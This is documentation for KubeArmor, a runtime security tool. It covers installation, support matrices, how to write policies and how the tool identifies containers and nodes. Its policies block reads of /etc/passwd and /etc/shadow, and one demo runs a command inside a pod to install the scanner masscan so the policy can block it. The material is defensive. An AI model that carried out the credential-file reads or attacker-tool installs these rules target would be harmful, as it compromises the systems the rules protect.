KubeArmor

KubeArmor is a cloud-native runtime security enforcement system that restricts the behavior (such as process execution, file access, and networking operations) of pods, containers, and nodes (VMs) at the system level.

Architecture Overview · Biweekly Meeting · CNCF · ROADMAP · Wiki

KubeArmor is a runtime security enforcement system for containers and nodes. It uses security policies (defined as Kubernetes Custom Resources like KSP, HSP, and CSP) to define allowed, audited, or blocked actions for workloads. The system monitors system activity using kernel technologies such as eBPF and enforces the defined policies by integrating with the underlying operating system's security modules like AppArmor, SELinux, or BPF-LSM, sending security alerts and telemetry through a log feeder.

Visual Overview

KubeArmor leverages Linux security modules (LSMs) such as AppArmor, SELinux, or BPF-LSM to enforce the user-specified policies. KubeArmor generates rich alerts/telemetry events with container/pod/namespace identities by leveraging eBPF.

| 💪 Harden Infrastructure | 💍 Least Permissive Access | 🔭 Application Behavior | ❄️ Deployment Models |
|---|---|---|---|
| Protect critical paths such as cert bundles | Process Whitelisting | Process execs, File System accesses | Kubernetes Deployment |
| MITRE, STIGs, CIS based rules | Network Whitelisting | Service binds, Ingress, Egress connections | Containerized Deployment |
| Restrict access to raw DB table | Control access to sensitive assets | Sensitive system call profiling | VM/Bare-Metal Deployment |

Documentation

👉 Getting Started

🎯 Use Cases

✔️ KubeArmor Support Matrix

♟️ How is KubeArmor different?

📜 Security Policy for Pods/Containers (KSP) [Spec] [Examples]

📜 Cluster level Security Policy for Pods/Containers (CSP) [Spec] [Examples]

📜 Security Policy for Hosts/Nodes (HSP) [Spec] [Examples]

... and more in the detailed documentation.

Contribution

📘 Contribution Guide

🧑‍💻 Development Guide, Testing Guide

✋ Join KubeArmor Slack

❓ FAQs

Biweekly Meeting

🗣️ Zoom Link

📄 Minutes: Document

📆 Calendar invite: Google Calendar, ICS file

Notice/Credits

KubeArmor uses Tracee's system call utility functions.

KubeArmor is a Sandbox Project of the Cloud Native Computing Foundation.

KubeArmor roadmap is tracked via KubeArmor Projects.


VM/Bare-Metal Deployment

This recipe explains how to use KubeArmor directly on a VM or bare-metal machine; the following steps were tested on Ubuntu hosts.

The recipe installs kubearmor as a systemd process and the karmor CLI tool to manage policies and show alerts/telemetry.

Download and Install KubeArmor

Download the latest release of KubeArmor.

  1. Install KubeArmor (VER is the KubeArmor release version):
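If you haven't downloaded the package yet, it can be fetched from the KubeArmor GitHub releases page. A minimal sketch (the asset URL pattern mirrors the tarball URL shown below for other distros; the version value is hypothetical):

VER=1.3.8  # hypothetical release version; pick one from the releases page
wget https://github.com/KubeArmor/KubeArmor/releases/download/v${VER}/kubearmor_${VER}_linux-amd64.deb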

sudo apt --no-install-recommends install ./kubearmor_${VER}_linux-amd64.deb

Note that the above command doesn't install the recommended packages, since we ship the BPF object files along with the package. In case your kernel doesn't have BTF support, consider removing the --no-install-recommends flag.

For distributions other than Ubuntu/Debian

  1. Refer to Installing BCC to install the pre-requisites.

  2. Download the release tarball from KubeArmor releases for the version you want:

wget https://github.com/KubeArmor/KubeArmor/releases/download/v${VER}/kubearmor_${VER}_linux-amd64.tar.gz

  3. Unpack the tarball to the root directory:

sudo tar --no-overwrite-dir -C / -xzf kubearmor_${VER}_linux-amd64.tar.gz
sudo systemctl daemon-reload

Start KubeArmor

sudo systemctl start kubearmor

Check the status of KubeArmor using sudo systemctl status kubearmor or use sudo journalctl -u kubearmor -f to continuously monitor kubearmor logs.

Apply sample policy

The following policy denies execution of the sleep binary on the host:

apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: hsp-kubearmor-dev-proc-path-block
spec:
  nodeSelector:
    matchLabels:
      kubearmor.io/hostname: "*" # Apply to all hosts
  process:
    matchPaths:
    - path: /usr/bin/sleep # try sleep 1
  action:
    Block

Save the above policy to hostpolicy.yaml and apply:

karmor vm policy add hostpolicy.yaml

Now if you run the sleep command, the process will be denied execution.

Note that sleep may not be blocked if you run it in the same terminal where you apply the above policy. In that case, please open a new terminal and run sleep again to see if the command is blocked.
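For instance, in a new terminal (illustrative output; the exact shell error message may vary by shell and enforcer):

$ sleep 1
-bash: /usr/bin/sleep: Permission denied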

Get Alerts for policies and telemetry

karmor logs --gRPC=:32767 --json
{
  "Timestamp": 1717259989,
  "UpdatedTime": "2024-06-01T16:39:49.360067Z",
  "HostName": "kubearmor-dev",
  "HostPPID": 1582,
  "HostPID": 2420,
  "PPID": 1582,
  "PID": 2420,
  "UID": 1000,
  "ParentProcessName": "/usr/bin/bash",
  "ProcessName": "/usr/bin/sleep",
  "PolicyName": "hsp-kubearmor-dev-proc-path-block",
  "Severity": "1",
  "Type": "MatchedHostPolicy",
  "Source": "/usr/bin/bash",
  "Operation": "Process",
  "Resource": "/usr/bin/sleep",
  "Data": "lsm=SECURITY_BPRM_CHECK",
  "Enforcer": "BPFLSM",
  "Action": "Block",
  "Result": "Permission denied",
  "Cwd": "/"
}

Support Matrix

KubeArmor supports the following types of workloads:

  1. K8s orchestrated: Workloads deployed as k8s orchestrated containers. In this case, KubeArmor is deployed as a k8s daemonset. Note that KubeArmor supports policy enforcement on both k8s-pods (KubeArmorPolicy) and k8s-nodes (KubeArmorHostPolicy).

  2. Containerized: Workloads that are containerized but not k8s orchestrated are supported. KubeArmor installed in systemd mode can be used to protect such workloads.

  3. VM/Bare-Metal: Workloads deployed on Virtual Machines or Bare Metal, i.e. workloads directly operating as host/system processes. In this case, KubeArmor is deployed in systemd mode.

Kubernetes Support Matrix

| Provider | K8s engine | OS Image | Arch | LSM Enforcer | Remarks |
|---|---|---|---|---|---|
| Onprem | kubeadm, k0s, k3s, microk8s | Distros | x86_64, ARM | BPFLSM, AppArmor | |
| Google | GKE | COS | x86_64 | BPFLSM, AppArmor | All release channels |
| Google | GKE | Ubuntu >= 16.04 | x86_64 | BPFLSM, AppArmor | All release channels |
| Microsoft | AKS | Ubuntu >= 18.04 | x86_64 | BPFLSM, AppArmor | |
| Oracle | OKE | UEK >= 7 | x86_64 | BPFLSM | Oracle Linux Server 8.7 |
| IBM | IKS | Ubuntu | x86_64 | BPFLSM, AppArmor | |
| Talos | Talos k8s | Talos | x86_64 | BPFLSM | 1540 |
| AWS | EKS | Amazon Linux 2 (kernel >=5.8) | x86_64 | BPFLSM | |
| AWS | EKS | Ubuntu | x86_64 | AppArmor | |
| AWS | EKS | Bottlerocket | x86_64 | BPFLSM | |
| AWS | EKS-Auto-Mode | Bottlerocket | x86_64 | BPFLSM | |
| AWS | EKS | Ubuntu | ARM (Graviton) | AppArmor | |
| AWS | EKS | Amazon Linux 2 | ARM (Graviton) | SELinux | |
| RedHat | OpenShift | RHEL <= 8.4 | x86_64 | SELinux | |
| RedHat | OpenShift | RHEL >= 8.5 | x86_64 | BPFLSM | |
| RedHat | MicroShift | RHEL >= 9.2 | x86_64 | BPFLSM | |
| Rancher | RKE | SUSE | x86_64 | BPFLSM, AppArmor | |
| Rancher | K3S | Distros | x86_64 | BPFLSM, AppArmor | |
| Oracle | Ampere | UEK | ARM | SELinux | 1084 |
| VMware | Tanzu | TBD | x86_64 | | 1064 |
| Mirantis | MKE | Ubuntu >= 20.04 | x86_64 | AppArmor | 1181 |
| Digital Ocean | DOKS | Debian GNU/Linux 11 (bullseye) | x86_64 | BPFLSM | 1120 |
| Alibaba Cloud | Alibaba | Alibaba Cloud Linux 3.2104 LTS | x86_64 | BPFLSM | 1650 |

The platform I am interested in is not listed here! What can I do?

Please approach the KubeArmor community on slack or raise a GitHub issue to express interest in adding the support.

It would be very much appreciated if you could test KubeArmor on a platform you have access to that is not listed above. Once tested, you can update this document and raise a PR.

Supported Linux Distributions

The following distributions are tested for VM/Bare-metal based installations:




| Provider | Distro | VM / Bare-metal | Kubernetes |
|---|---|---|---|
| SUSE | SUSE Enterprise 15 | Full | Full |
| Debian | Buster / Bullseye | Full | Full |
| Ubuntu | 18.04 / 16.04 / 20.04 | Full | Full |
| RedHat / CentOS | RHEL / CentOS <= 8.4 | Full | Partial |
| RedHat / CentOS | RHEL / CentOS >= 8.5 | Full | Full |
| Fedora | Fedora 34 / 35 | Full | Full |
| Rocky Linux | Rocky Linux >= 8.5 | Full | Full |
| AWS | Amazon Linux 2022 | Full | Full |
| AWS | Amazon Linux 2023 | Full | Full |
| RaspberryPi (ARM) | Debian | Full | Full |
| ArchLinux | ArchLinux-6.2.1 | Full | Full |
| Alibaba | Alibaba Cloud Linux 3.2104 LTS 64 bit | Full | Full |

Note: Full: supports both enforcement and observability. Partial: supports only observability.

Security Policies (KSP, HSP, CSP)

Welcome to the KubeArmor tutorial! In this first chapter, we'll dive into one of the most fundamental concepts in KubeArmor: Security Policies. Think of these policies as the instruction manuals or rulebooks you give to KubeArmor, telling it exactly how applications and system processes should behave.

What are Security Policies?

In any secure system, you need rules that define what is allowed and what isn't. In Kubernetes and Linux, these rules can get complicated, dealing with things like which files a program can access, which network connections it can make, or which powerful system features (capabilities) it's allowed to use.

KubeArmor simplifies this by letting you define these rules using clear, easy-to-understand Security Policies. You write these policies in a standard format that Kubernetes understands (YAML files, using something called Custom Resource Definitions or CRDs), and KubeArmor takes care of translating them into the low-level security configurations needed by the underlying system.

These policies are powerful because they allow you to specify security rules for different parts of your system:

  1. KubeArmorPolicy (KSP): For individual Containers or Pods running in your Kubernetes cluster.

  2. KubeArmorHostPolicy (HSP): For the Nodes (the underlying Linux servers) where your containers are running. This is useful for protecting the host system itself, or even applications running directly on the node outside of Kubernetes.

  3. KubeArmorClusterPolicy (CSP): For applying policies across multiple Containers/Pods based on namespaces or labels cluster-wide.

Why Do We Need Security Policies?

Imagine you have a web server application running in a container. This application should only serve web pages and access its configuration files. It shouldn't be trying to access sensitive system files like /etc/shadow or connecting to unusual network addresses.

Without security policies, if your web server container gets compromised, an attacker might use it to access or modify sensitive data, or even try to attack other parts of your cluster or network.

KubeArmor policies help prevent this by enforcing the principle of least privilege. This means you only grant your applications and host processes the minimum permissions they need to function correctly.

Use Case Example: Let's say you have a simple application container that should never be allowed to read the /etc/passwd file inside the container. We can use a KubeArmor Policy (KSP) to enforce this rule.

Anatomy of a KubeArmor Policy

KubeArmor policies are defined as YAML files that follow a specific structure. This structure includes:

  1. Metadata: Basic information about the policy, like its name. For KSPs, you also specify the namespace it belongs to. HSPs and CSPs are cluster-scoped, meaning they don't belong to a specific namespace.

  2. Selector: This is how you tell KubeArmor which containers, pods, or nodes the policy should apply to. You typically use Kubernetes labels for this.

  3. Spec (Specification): This is the core of the policy where you define the actual security rules (what actions are restricted) and the desired outcome (Allow, Audit, or Block).

Let's look at a simplified structure:

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy # or KubeArmorHostPolicy, KubeArmorClusterPolicy
metadata:
  name: block-etc-passwd-read
  namespace: default # Only for KSP
spec:
  selector:
    # How to select the targets (pods for KSP, nodes for HSP, namespaces/labels for CSP)
    matchLabels:
      app: my-web-app # Apply this policy to pods with label app=my-web-app
  file: # Or 'process', 'network', 'capabilities', 'syscalls'
    matchPaths:
      - path: /etc/passwd
  action: Block # What to do if the rule is violated

Explanation:

  • apiVersion and kind: Identify this document as a KubeArmor Policy object.

  • metadata: Gives the policy a name (block-etc-passwd-read) and specifies the namespace (default) it lives in (for KSP).

  • spec: Contains the security rules.

  • selector: Uses matchLabels to say "apply this policy to any Pod in the default namespace that has the label app: my-web-app".

  • file: This section defines rules related to file access.

  • matchPaths: We want to match a specific file path.

  • - path: /etc/passwd: The specific file we are interested in.

  • action: Block: If any process inside the selected containers tries to access /etc/passwd, the action should be to Block that attempt.

This simple policy directly addresses our use case: preventing the web server (app: my-web-app) from reading /etc/passwd.
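To see it in action, you could save the manifest and apply it. A minimal sketch, assuming a pod labeled app=my-web-app exists in the default namespace (the file and pod names here are hypothetical):

kubectl apply -f block-etc-passwd-read.yaml
kubectl exec -it my-web-app-pod -- cat /etc/passwd
# expected: cat: /etc/passwd: Permission denied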

Policy Types in Detail

Let's break down the three types:

| Policy Type | Abbreviation | Scope | Selector Type(s) |
|---|---|---|---|
| KubeArmorPolicy | KSP | Containers / Pods (Scoped by Namespace) | matchLabels, matchExpressions |
| KubeArmorHostPolicy | HSP | Nodes / Host OS | nodeSelector (matchLabels) |
| KubeArmorClusterPolicy | CSP | Containers / Pods (Cluster-wide) | selector (matchExpressions on namespace or label) |

KubeArmorPolicy (KSP)

  • Applies to pods within a specific Kubernetes namespace.

  • Uses selector.matchLabels or selector.matchExpressions to pick which pods the policy applies to, based on their labels.

  • Example: Block /bin/bash execution in all pods within the dev namespace labeled role=frontend, as sketched below.
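A minimal sketch of such a KSP (the policy name is illustrative):

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: block-bash-exec # hypothetical name
  namespace: dev
spec:
  selector:
    matchLabels:
      role: frontend
  process:
    matchPaths:
    - path: /bin/bash
  action:
    Block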

KubeArmorHostPolicy (HSP)

  • Applies to the host operating system of the nodes in your cluster.

  • Uses nodeSelector.matchLabels to pick which nodes the policy applies to, based on node labels.

  • Example: Prevent the /usr/bin/ssh process on nodes labeled node-role.kubernetes.io/worker from accessing /etc/shadow, as sketched below.
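A minimal sketch of such an HSP (the policy name and the exact worker-node label value are illustrative):

apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: block-ssh-shadow-access # hypothetical name
spec:
  nodeSelector:
    matchLabels:
      node-role.kubernetes.io/worker: ""
  file:
    matchPaths:
    - path: /etc/shadow
      fromSource:
      - path: /usr/bin/ssh
  action:
    Block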

KubeArmorClusterPolicy (CSP)

  • Applies to pods across multiple namespaces or even the entire cluster.

  • Uses selector.matchExpressions which can target namespaces (key: namespace) or labels (key: label) cluster-wide.

  • Example: Audit all network connections made by pods in the default or staging namespaces (see the sketch below). Or, block /usr/bin/curl execution in all pods across the cluster except those labeled app=allowed-tools.
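A minimal sketch of a CSP for the first example (the policy name is illustrative; matchProtocols is used here to cover TCP and UDP connections):

apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
  name: audit-net-default-staging # hypothetical name
spec:
  selector:
    matchExpressions:
    - key: namespace
      operator: In
      values:
      - default
      - staging
  network:
    matchProtocols:
    - protocol: tcp
    - protocol: udp
  action:
    Audit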

These policies become Kubernetes Custom Resources when KubeArmor is installed. You can see their definitions in the KubeArmor source code under the deployments/CRD directory (KubeArmorPolicy CRD, KubeArmorHostPolicy CRD, KubeArmorClusterPolicy CRD), and their corresponding Go type definitions are in types/types.go. You don't need to understand Go or CRD internals right now; just know that these files formally define the structure and rules for creating KubeArmor policies that Kubernetes understands.

How KubeArmor Uses Policies (Under the Hood)

You've written a policy YAML file. What happens when you apply it to your Kubernetes cluster using kubectl apply -f your-policy.yaml?

  1. Policy Creation: You create the policy object in the Kubernetes API Server.

  2. KubeArmor Watches: The KubeArmor DaemonSet (a component running on each node) is constantly watching the Kubernetes API Server for KubeArmor policy objects (KSP, HSP, CSP).

  3. Policy Discovery: KubeArmor finds your new policy.

  4. Target Identification: KubeArmor evaluates the policy's selector (or nodeSelector) to figure out exactly which pods/containers or nodes this policy applies to.

  5. Translation: For each targeted container or node, KubeArmor translates the high-level rules defined in the policy's spec (like "Block access to /etc/passwd") into configurations for the underlying security enforcer (which could be AppArmor, SELinux, or BPF, depending on your setup and KubeArmor's configuration - we'll talk more about these later).

  6. Enforcement: The security enforcer on that specific node is updated with the new low-level rules. Now, if a targeted process tries to do something forbidden by the policy, the enforcer steps in to Allow, Audit, or Block the action as specified.

This flow shows how KubeArmor acts as the bridge between your easy-to-write YAML policies and the complex, low-level security mechanisms of the operating system.

Policy Actions: Allow, Audit, Block

Every rule in a KubeArmor policy (within the spec section) specifies an action. This tells KubeArmor what to do if the rule's condition is met.

  • Allow: Explicitly permits the action. This is useful for creating "whitelist" policies where you only allow specific behaviors and implicitly block everything else.

  • Audit: Does not prevent the action but generates a security alert or log message when it happens. This is great for testing policies before enforcing them or for monitoring potentially suspicious activity without disrupting applications.

  • Block: Prevents the action from happening and generates a security alert. This is for enforcing strict "blacklist" rules where you explicitly forbid certain dangerous behaviors.

Remember the "Note" mentioned in the provided policy specifications: For system call monitoring (syscalls), KubeArmor currently only supports the Audit action, regardless of what is specified in the policy YAML.

Conclusion

In this chapter, you learned that KubeArmor Security Policies (KSP, HSP, CSP) are your rulebooks for defining security posture in your Kubernetes environment. You saw how they use Kubernetes concepts like labels and namespaces to target specific containers, pods, or nodes. You also got a peek at the basic structure of these policies, including the selector for targeting and the spec for defining rules and actions.

Understanding policies is the first step to using KubeArmor effectively to protect your workloads and infrastructure. In the next chapter, we'll explore how KubeArmor identifies the containers and nodes it is protecting, which is crucial for the policy engine to work correctly.

Container/Node Identity

Welcome back to the KubeArmor tutorial! In the previous chapter, we learned about KubeArmor's Security Policies (KSP, HSP, CSP) and how they define rules for what applications and processes are allowed or forbidden to do. We saw that these policies use selectors (like labels and namespaces) to tell KubeArmor which containers, pods, or nodes they should apply to.

But how does KubeArmor know which policy to apply when something actually happens, like a process trying to access a file? When an event occurs deep within the operating system (like a process accessing /etc/shadow), the system doesn't just say "a pod with label app=my-web-app did this". It provides low-level details like Process IDs (PID), Parent Process IDs (PPID), and Namespace IDs (like PID Namespace and Mount Namespace).

This is where the concept of Container/Node Identity comes in.

What is Container/Node Identity?

Think of Container/Node Identity as KubeArmor's way of answering the question: "Who is doing this?".

When a system event happens on a node – maybe a process starts, a file is opened, or a network connection is attempted – KubeArmor intercepts this event. The event data includes technical details about the process that triggered it. KubeArmor needs to take these technical details and figure out if the process belongs to:

  1. A specific Container (which might be part of a Kubernetes Pod or a standalone Docker container).

  2. Or, the Node itself (the underlying Linux operating system, potentially running processes outside of containers).

Once KubeArmor knows who is performing the action (the specific container or node), it can then look up the relevant security policies that apply to that identity and decide whether to allow, audit, or block the action.

Why is Identity Important? A Simple Use Case

Imagine you have a KubeArmorPolicy (KSP) that says: "Block any attempt by containers with the label app: sensitive-data to read the file /sensitive/config."

# simplified KSP
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: block-sensitive-file-read
  namespace: default
spec:
  selector:
    matchLabels:
      app: sensitive-data # Policy applies to containers/pods with this label
  file:
    matchPaths:
      - path: /sensitive/config # Specific file to protect
        readOnly: true # Protect against writes too, but let's focus on read
  action: Block # If read is attempted, block it

Now, suppose a process inside one of your containers tries to open /sensitive/config.

  • Without Identity: KubeArmor might see an event like "Process with PID 1234 and Mount Namespace ID 5678 tried to read /sensitive/config". Without knowing which container PID 1234 and MNT NS 5678 belong to, KubeArmor can't tell if this process is running in a container labeled app: sensitive-data. It wouldn't know which policy applies!

  • With Identity: KubeArmor sees the event, looks up PID 1234 and MNT NS 5678 in its internal identity map, and discovers "Ah, that PID and Namespace belong to Container ID abc123def456... which is part of Pod my-sensitive-pod-xyz in namespace default, and that pod has the label app: sensitive-data." Now it knows this event originated from a workload targeted by the block-sensitive-file-read policy. It can then apply the Block action.

So, identifying the workload responsible for a system event is fundamental to enforcing policies correctly.

How KubeArmor Identifies Workloads

KubeArmor runs as a DaemonSet on each node in your Kubernetes cluster (or directly on a standalone Linux server). This daemon is responsible for monitoring system activity on that specific node. To connect these low-level events to higher-level workload identities (like Pods or Nodes), KubeArmor does a few things:

  1. Watching Kubernetes (for K8s environments): The KubeArmor daemon watches the Kubernetes API Server for events related to Pods and Nodes. When a new Pod starts, KubeArmor gets its details:

    • Pod Name

    • Namespace Name

    • Labels (this is key for policy selectors!)

    • Container details (Container IDs, Image names)

    • Node Name where the Pod is scheduled. KubeArmor stores this information.

  2. Interacting with Container Runtimes: KubeArmor talks to the container runtime (like Docker or containerd) running on the node. It uses the Container ID (obtained from Kubernetes or by watching runtime events) to get more low-level details:

    • Container PID (the process ID of the main process inside the container as seen from the host OS).

    • Container Namespace IDs (specifically the PID Namespace ID and Mount Namespace ID). These IDs are crucial because system events are often reported with these namespace identifiers.

  3. Monitoring Host Processes: KubeArmor also monitors processes running directly on the host node (outside of containers).

KubeArmor builds and maintains an internal map that links these low-level identifiers (like PID Namespace ID + Mount Namespace ID) to the corresponding higher-level identities (Container ID, Pod Name, Namespace, Node Name, Labels).

This identity mapping happens and is used in two main phases:

  1. Identity Discovery: KubeArmor actively gathers information from Kubernetes and the container runtime to build its understanding of which system identifiers belong to which workloads.

  2. Event Correlation: When a system event occurs, KubeArmor uses the identifiers from the event (like Namespace IDs) to quickly look up the corresponding workload identity in its map.

Looking at the Code (Simplified)

The KubeArmor code interacts with Kubernetes and Docker/containerd to get this identity information.

For Kubernetes environments, KubeArmor's k8sHandler watches for Pod and Node events:

// KubeArmor/core/k8sHandler.go (Simplified)

// WatchK8sPods Function
func (kh *K8sHandler) WatchK8sPods(nodeName string) *http.Response {
	// ... code to build API request URL ...
	// The URL includes '?watch=true' to get a stream of events
	URL := "https://" + kh.K8sHost + ":" + kh.K8sPort + "/api/v1/pods?watch=true"

	// ... code to make HTTP request to K8s API server ...
	// Returns a response stream where KubeArmor reads events
	resp, err := kh.WatchClient.Do(req)
	if err != nil {
		return nil // Handle error
	}
	return resp
}

// ... similar functions exist to watch Nodes and Policies ...

This snippet shows that KubeArmor isn't passively waiting; it actively watches the Kubernetes API for changes using standard Kubernetes watch mechanisms. When a Pod is added, updated, or deleted, KubeArmor receives an event and updates its internal state.

For Docker (and similar logic exists for containerd), KubeArmor's dockerHandler can inspect running containers to get detailed information:

// KubeArmor/core/dockerHandler.go (Simplified)

// GetContainerInfo Function
func (dh *DockerHandler) GetContainerInfo(containerID string, OwnerInfo map[string]tp.PodOwner) (tp.Container, error) {
	if dh.DockerClient == nil {
		return tp.Container{}, errors.New("no docker client")
	}

	// Ask the Docker daemon for details about a specific container ID
	inspect, err := dh.DockerClient.ContainerInspect(context.Background(), containerID)
	if err != nil {
		return tp.Container{}, err // Handle error
	}

	container := tp.Container{}
	container.ContainerID = inspect.ID
	container.ContainerName = strings.TrimLeft(inspect.Name, "/")

	// Get Kubernetes specific labels if available (e.g., for Pod name, namespace)
	containerLabels := inspect.Config.Labels
	if val, ok := containerLabels["io.kubernetes.pod.namespace"]; ok {
		container.NamespaceName = val
	}
	if val, ok := containerLabels["io.kubernetes.pod.name"]; ok {
		container.EndPointName = val // In KubeArmor types, EndPoint often refers to a Pod or standalone Container
	}
    // ... get other details like image, apparmor profile, privileged status ...

	// Get the *host* PID of the container's main process
	pid := strconv.Itoa(inspect.State.Pid)

	// Read /proc/<host-pid>/ns/pid and /proc/<host-pid>/ns/mnt to get Namespace IDs
	if data, err := os.Readlink(filepath.Join(cfg.GlobalCfg.ProcFsMount, pid, "/ns/pid")); err == nil {
		fmt.Sscanf(data, "pid:[%d]\n", &container.PidNS)
	}
	if data, err := os.Readlink(filepath.Join(cfg.GlobalCfg.ProcFsMount, pid, "/ns/mnt")); err == nil {
		fmt.Sscanf(data, "mnt:[%d]\n", &container.MntNS)
	}

    // ... store labels, etc. ...

	return container, nil
}

This function is critical. It takes a containerID and retrieves its associated Namespace IDs (PidNS, MntNS) by reading special files in the /proc filesystem on the host, which link the host PID to the namespaces it belongs to. It also retrieves labels and other useful information directly from the container runtime's inspection data.

This collected identity information is stored internally. For example, the SystemMonitor component maintains a map (NsMap) to quickly look up a workload based on Namespace IDs:

// KubeArmor/monitor/processTree.go (Simplified)

// NsKey Structure (used as map key)
type NsKey struct {
	PidNS uint32
	MntNS uint32
}

// LookupContainerID Function
// This function is used when an event comes in with PidNS and MntNS
func (mon *SystemMonitor) LookupContainerID(pidns, mntns uint32) string {
	key := NsKey{PidNS: pidns, MntNS: mntns}

	mon.NsMapLock.RLock() // Use read lock for looking up
	defer mon.NsMapLock.RUnlock()

	if val, ok := mon.NsMap[key]; ok {
		// If the key (Namespace IDs) is in the map, return the ContainerID
		return val
	}

	// Return empty string if not found (might be a host process)
	return ""
}

// AddContainerIDToNsMap Function
// This function is called when KubeArmor discovers a new container
func (mon *SystemMonitor) AddContainerIDToNsMap(containerID string, namespace string, pidns, mntns uint32) {
	key := NsKey{PidNS: pidns, MntNS: mntns}

	mon.NsMapLock.Lock() // Use write lock for modifying the map
	defer mon.NsMapLock.Unlock()

	// Store the mapping: Namespace IDs -> Container ID
	mon.NsMap[key] = containerID

    // ... also updates other maps related to namespaces and policies ...
}

These functions from processTree.go show how KubeArmor builds and uses the core identity mapping: it stores the relationship between Namespace IDs (found in system events) and the Container ID, allowing it to quickly identify which container generated an event.

Identity Types Summary

KubeArmor primarily identifies workloads using the following:

| Workload Type | Key Identifiers Monitored/Used | Source of Information |
|---|---|---|
| Container | Container ID, PID Namespace ID, Mount Namespace ID, Pod Name, Namespace, Labels | Kubernetes API, Container Runtime |
| Node | Node Name, Node Labels, Operating System Info | Kubernetes API, Host OS APIs |

This allows KubeArmor to apply the correct security policies, whether they are KSPs (targeting Containers/Pods based on labels/namespaces) or HSPs (targeting Nodes based on node labels).

Conclusion

Understanding Container/Node Identity is key to grasping how KubeArmor works. It's the crucial step where KubeArmor translates low-level system events into the context of your application workloads (containers in pods) or your infrastructure (nodes). By maintaining a map of system identifiers to workload identities, KubeArmor can accurately determine which policies apply to a given event and enforce your desired security posture.

In the next chapter, we'll look at the component that takes this identified event and the relevant policy and makes the decision to allow, audit, or block the action.

Differentiation

Significance of Inline Mitigation

KubeArmor supports attack prevention, not just observability and monitoring. More importantly, the prevention is handled inline: even before a process is spawned, a rule can deny its execution. Most other systems employ "post-attack mitigation", which kills a process/pod after malicious intent is observed, allowing an attacker to execute code on the target environment. Essentially, KubeArmor uses inline mitigation to reduce the attack surface of a pod/container/VM.

KubeArmor leverages best-of-breed Linux Security Modules (LSMs) such as AppArmor, BPF-LSM, and SELinux (only for host protection) for inline mitigation. LSMs have several advantages over other techniques:

  • KubeArmor does not change anything with the pod/container.

  • KubeArmor does not require any changes at the host level or at the CRI (Container Runtime Interface) level to enforce blocking rules. KubeArmor deploys as a non-privileged DaemonSet with certain capabilities that allow it to monitor other pods/containers and the host.

  • A given cluster can have multiple nodes utilizing different LSMs. KubeArmor abstracts away the complexities of the LSMs and provides an easy way to enforce policies, managing the LSM-specific details under the hood.

Post-Attack Mitigation and its flaws

  • Post-exploit Mitigation works by killing a suspicious process in response to an alert indicating malicious intent.

  • The attacker is allowed to execute a binary, and could disable security controls, access logs, etc. to circumvent attack detection.

  • By the time a malicious process is killed, sensitive contents could have already been deleted, encrypted, or transmitted.

  • Quoting Grsecurity, "post-exploitation detection/mitigation is at the mercy of an exploit writer putting little to no effort into avoiding tripping these detection mechanisms."

Problems with k8s native Pod Security Context

Kubernetes' native Pod Security Context allows one to specify native AppArmor or native SELinux policies. This approach has multiple problems:

  1. It is often difficult to predict which LSM (AppArmor or SELinux) would be available on the target node.

  2. BPF-LSM is not supported by Pod Security Context.

  3. It is difficult to manually specify an AppArmor or SELinux policy. Changing default AppArmor or SELinux policies might result in more security holes since it is difficult to decipher the implications of the changes and can be counter-productive.

Problems with multi-cloud deployment

Different managed cloud providers use different default distributions. Google GKE COS uses AppArmor by default, AWS Bottlerocket uses BPF-LSM and SELinux, and AWS Amazon Linux 2 uses only SELinux by default. Thus it is challenging to use Pod Security Context in multi-cloud deployments.

Use of BPF-LSM

References:

  • Armoring Cloud Native Workloads with BPF-LSM

  • Securing Bottlerocket deployments on Amazon EKS with KubeArmor

Getting Started

This guide assumes you have access to a k8s cluster. If you want to try non-k8s mode, for instance systemd mode to protect/audit containers or processes on VMs/bare-metal, check here.

Install KubeArmor

Check the KubeArmor support matrix to verify if your platform is supported.

helm repo add kubearmor https://kubearmor.github.io/charts
helm repo update kubearmor
helm upgrade --install kubearmor-operator kubearmor/kubearmor-operator -n kubearmor --create-namespace
kubectl apply -f https://raw.githubusercontent.com/kubearmor/KubeArmor/main/pkg/KubeArmorOperator/config/samples/sample-config.yml

You can find more details about helm related values and configurations here.

Install kArmor CLI (Optional)

curl -sfL http://get.kubearmor.io/ | sudo sh -s -- -b /usr/local/bin
# sudo access is needed to install it in /usr/local/bin directory. But, if you prefer not to use sudo, you can install it in a different directory which is in your PATH.

[!NOTE] kArmor CLI provides a developer-friendly way to interact with KubeArmor telemetry. You can stream KubeArmor telemetry independently of the kArmor CLI tool and integrate it with your chosen SIEM (Security Information and Event Management) solution. Here's a guide on how to achieve this integration. This guide assumes you have the kArmor CLI to access KubeArmor telemetry, but you can view it on your SIEM tool once integrated.

Deploy test nginx app

kubectl create deployment nginx --image=nginx
POD=$(kubectl get pod -l app=nginx -o name)

[!NOTE] $POD is used to refer to the target nginx pod in many cases below.

Sample policies

Deny execution of package management tools (apt/apt-get)

Package management tools can be used in the runtime environment to download new binaries that will increase the attack surface of the pods. Attackers use package management tools to download accessory tooling (such as masscan) to further their cause. It is better to block usage of package management tools in production environments.

Let's apply the policy to block such execution:

cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: block-pkg-mgmt-tools-exec
spec:
  selector:
    matchLabels:
      app: nginx
  process:
    matchPaths:
    - path: /usr/bin/apt
    - path: /usr/bin/apt-get
  action:
    Block
EOF

Now execute the apt command to download the masscan tool:

kubectl exec -it $POD -- bash -c "apt update && apt install masscan"

It will be denied permission to execute:

sh: 1: apt: Permission denied
command terminated with exit code 126

If you don't see Permission denied, please refer to here to debug this issue.

Get policy violation notifications using kArmor CLI:

karmor logs -n default --json
{
  "Timestamp": 1686475183,
  "UpdatedTime": "2023-06-11T09:19:43.451704Z",
  "ClusterName": "default",
  "HostName": "ip-172-31-24-142",
  "NamespaceName": "default",
  "PodName": "nginx-8f458dc5b-fl42t",
  "Labels": "app=nginx",
  "ContainerID": "8762eafc25a35ab90089f79703b86659989e8e547c2c029fb60f55d884355000",
  "ContainerName": "nginx",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:af296b188c7b7df99ba960ca614439c99cb7cf252ed7bbc23e90cfda59092305",
  "HostPPID": 3341922,
